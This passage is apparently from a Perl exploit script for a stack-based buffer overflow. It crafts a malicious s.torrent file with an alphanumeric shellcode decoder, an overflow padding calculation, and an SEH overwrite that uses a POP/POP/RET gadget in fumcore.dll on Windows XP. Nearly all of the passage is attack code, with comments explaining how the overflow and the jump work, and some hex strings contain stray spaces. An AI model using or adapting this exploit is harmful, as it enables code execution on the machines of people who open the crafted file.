"\x42\x50\x 42\x30\x42\x30\x4b\x58\x4a\x36\x4e\x53\x4f\x35\x41\x53".
"\x48\x4f\x42\x36\x48\x35\x49\x38\x4a\x4f\x43\x38\x42\x4c\x4b\x37".
"\x42\x35\x4a \x36\x50\x47\x4a\x4d\x44\x4e\x43\x37\x4a\x56\x4a\x59".
"\x50\x4f\x4c\x48\x50\x30\x47\x45\x4f\x4f\x47\x4e\x43\x36\x41\x56".
"\x4e\x36\x43\x 46\x42\x30\x5a";

#This is the shellcode builder or assembler. It gets the location of the shellcode and then from there does
#the appropriate modifications to apply the correct hex bytes that were deleted off the buffer (0x80=> bytes).
#You can only use the Alpha numerical shellcodes for the Shellcode builder ;), but remember to add
#0x01 before each 0x80=> byte.
my $shellcode_builder = ("\x59" x 3 ."\x40" x 9 . "\x51\x5b"."\x4b" x 4 ."\x01\x03"."\x48" x 10 ."\x43\x01\x03" x 3).
("\x4b" x 3 ."\x03\x0b" x 35 ."\x41" x 14 ."\x41\x01\x01\x01\x01"."\x41\x01\x01" x 2).
("\x49" x 3 ."\x48"."\x01\x01" x 5 ."\x40" x 3 ."\x01\x01\x41\x01\x01").
("\x49" x 2 ."\x48" x 3 ."\x01\x01" x 13 ."\x40" x 3 ."\x01\x01\x41\x01\x01").
("\x49" x 3 ."\x48" x 3 ."\x01\x01" x 11 ."\x49" x 3 ."\x01\x01" x 11).
("\x40" x 3 ."\x41\x01\x01"."\x41" x 3 ."\x01\x01"."\x41" x 6 ."\x01\x01");
my $len = 12999 - (10000 + (350 - length($shellcode_builder)) + length($shellcode) + 12 + length($shellcode_builder)); #Really important calculation to overflow the stack #and set everything in the right places(ret,addr,etc).
my $shellcode_builder_label = "\x01\x01\x01\x01"; #Used as a 'label' to create a DWORD 0x0000000a used in a calculation to get shellcode location.
my $overflow1 = "\x41" x 10000;
my $overflow2 = "\x41" x $len;
my $sled = "\x41" x (350 - length($shellcode_builder));
my $sehjmp = "\x71\x06\x01\x01"; #Since we cannot use 0xEB, I am going to use another type of jump
my $sehret = "\x1a\x09\x03\x10"; #0x1003091A fumcore.dll POP ESI, POP EDI, RETN (For XP <= Systems)

open(my $torrent, "> s.torrent");
print $torrent $tdata1.
$overflow1.$shellcode_builder_label.$sehjmp.$sehret.$shellcode_builder.$sled.$shellcode.$overflow2.
$tdata2;
close $torrent;